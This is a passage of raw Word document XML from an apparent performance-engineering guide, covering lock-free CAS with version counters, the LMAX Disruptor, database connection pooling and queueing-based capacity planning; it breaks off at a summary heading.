    <w:p w14:paraId="7FAF9D8F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Solution: CAS with version counter (tagged pointer)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F3C80AC" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  compare_exchange((value=5, version=1), (new_val=6, version=2))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F20F491" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread B's changes: (5,1) → (3,2) → (5,3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E532D5A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Thread A's CAS: expects (5,1), finds (5,3) → FAILS correctly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FFA4E4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>LMAX Disruptor — the ultimate throughput data structure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5565BECE" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t>The Disruptor (used by LMAX exchange, achieving millions of transactions/second on commodity hardware) is a lock-free ring buffer that avoids CAS contention through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B55C7F7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single writer principle:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Each position in the ring buffer is written by exactly one producer thread — no CAS needed for claiming a slot.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E5347B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-allocated memory:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Ring buffer is allocated upfront, avoiding GC pressure from object allocation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481B4626" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache line padding:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Each critical variable padded to its own cache line — no false sharing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595EF61F" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1447"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mechanical sympathy:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Data layout matched to hardware (sequential memory access, cache line alignment).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B14E6B1" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BE2EF90" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Disruptor throughput: 25 million transactions/second on a single core</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C0D4A4B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>LinkedBlockingQueue: ~5 million transactions/second (for comparison)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7F711" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Improvement: 5× purely from eliminating lock overhead and GC pressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FDF628" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connection Pooling — Amortizing Connection Overhead</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D9321A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7563D38D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Without connection pooling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B7CCB3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-request: TCP handshake (1 RTT) + TLS handshake (1 RTT) + DB handshake</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5334A7E6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 100ms RTT: 200ms+ overhead before any query executes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2619F73A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput limited by: 1 / (connection_overhead + query_time)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2E2949" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="7EF2BEB7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>With connection pooling:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B7395" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Connection established once, reused thousands of times</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDDF3C6" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Per-request: just the query time (1-10ms typically)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66DDA1D5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Throughput limited by: 1 / query_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F965D57" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="2687C134" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Pool sizing via Little's Law:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410B9F43" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Pool_size = throughput × avg_query_time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E9B018" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  For 1000 QPS with 10ms avg query time: Pool_size = 1000 × 0.01 = 10 connections minimum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="211571FF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Add 50% headroom for variance: 15 connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC2FF0E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29BF9780" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Oversizing the pool: wastes DB server memory (each connection = ~5-10MB on PostgreSQL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3623D40E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Undersizing the pool: requests queue waiting for connections (latency spike)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178AECAA" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The database connection limit:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A5E57D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>PostgreSQL's max_connections (default 100) limits total connections. With 10 application servers each wanting a pool of 20: 200 connections needed &gt; 100 maximum. Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4261BAEF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PgBouncer (connection pooler):</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Maintains N connections to PostgreSQL, serves M application connections. M &gt;&gt; N via multiplexing. Transaction-mode pooling: an application connection is associated with a PostgreSQL connection only for the duration of a transaction — one PostgreSQL connection can serve many application connections sequentially.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4D4A73" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1448"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Increase max_connections:</w:t>
      </w:r>
      <w:r w:rsidRPr="001F1994">
        <w:t> Each connection in PostgreSQL uses ~5-10MB of memory. 1000 connections × 10MB = 10GB just for connection overhead. Memory and shared memory limits bound this.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="422DFFA2" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="15819E42">
          <v:rect id="_x0000_i5205" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B4CC3B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>10. Capacity Planning — Throughput and Latency Under Growth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280BE03B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The Capacity Planning Process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA60761" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 1 — Establish baseline measurements:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E760D2B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11E43145" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Current metrics (from monitoring):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A42E746" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Peak RPS: 1,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AF6602" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99 latency: 150ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9450D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  CPU utilization: 60%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="520AD3F8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Memory utilization: 70%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0472BF8B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  DB connection pool utilization: 40%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412AE0EF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Cache hit rate: 85%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2503F576" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EC7208" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>SLO targets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DF5F4B" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99 latency &lt; 200ms</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54579789" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Availability &gt; 99.9%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5D5410" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Error rate &lt; 0.1%</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6EB5DD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 2 — Model growth:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0443C724" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373B5A43" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Projected growth: 3× in 12 months</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B02A04A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Projected peak RPS: 3,000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECC42ED" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6D30444E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>At 3× current load (3,000 RPS):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB945BD" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Using M/M/1 model at projected utilization:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31B568F5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  CPU: 60% × 3 = 180% → needs 2× current CPU (at least 2 more servers)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17885E3E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  Memory: 70% × 3 = 210% → needs more memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65941ED4" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  DB connections: 40% × 3 = 120% → pool will be exhausted → latency spike</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6F8E98" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE466C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  p99 latency at 90% CPU utilization (before adding capacity):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A0519C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  W_90% = W_60% × (1-0.6)/(1-0.9) = 150ms × 0.4/0.1 = 600ms (violates SLO)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F67A63C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 3 — Identify when capacity must be added:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26614076" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2C196" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Current CPU: 60% utilization at 1,000 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF985B7" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>M/M/1 latency multiplier:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418B7873" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  At 70% CPU: latency ≈ 150ms × (1-0.6)/(1-0.7) = 200ms (at SLO boundary)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E98ABBF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Must add capacity before 70% CPU utilization</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62017B4D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="6DE42CA9" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load at 70% CPU = 70/60 × 1,000 = 1,167 RPS → must scale before reaching 1,167 RPS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65923A9D" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Time to reach 1,167 RPS (at 3× annual growth = 0.79% per week):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35DF968A" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  weeks to 1.167× = log(1.167)/log(1.0079) ≈ 20 weeks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9F0F7C" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t xml:space="preserve">  → Must add capacity within 20 weeks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A2202B5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Step 4 — Load test to validate projections:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45CE9A7E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Load testing (wrk2, Gatling, k6, Locust) validates that projected capacity handles projected load within SLO. Test at 110% of projected peak (load spikes beyond projections are normal). Identify the actual breaking point — the load at which latency violates SLO or errors begin.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2209AB38" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chaos engineering for capacity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA35D8" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Deliberately degrade components (kill a server, fill a disk, inject latency to a dependency) while at full production load to validate that SLOs are maintained under partial failure. The breaking point under degraded conditions is the true capacity constraint.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F089A5" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:pict w14:anchorId="28A1125C">
          <v:rect id="_x0000_i5206" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADD412E" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F1994">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mental Model Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351A4B11" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CBE9E59" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Latency and Throughput — The Master Equations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CD87A3" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994"/>
    <w:p w14:paraId="32D940BF" w14:textId="77777777" w:rsidR="001F1994" w:rsidRPr="001F1994" w:rsidRDefault="001F1994" w:rsidP="001F1994">
      <w:r w:rsidRPr="001F1994">
        <w:t>Little's Law (the binding constraint):</w:t>
      </w:r>
    </w:p>
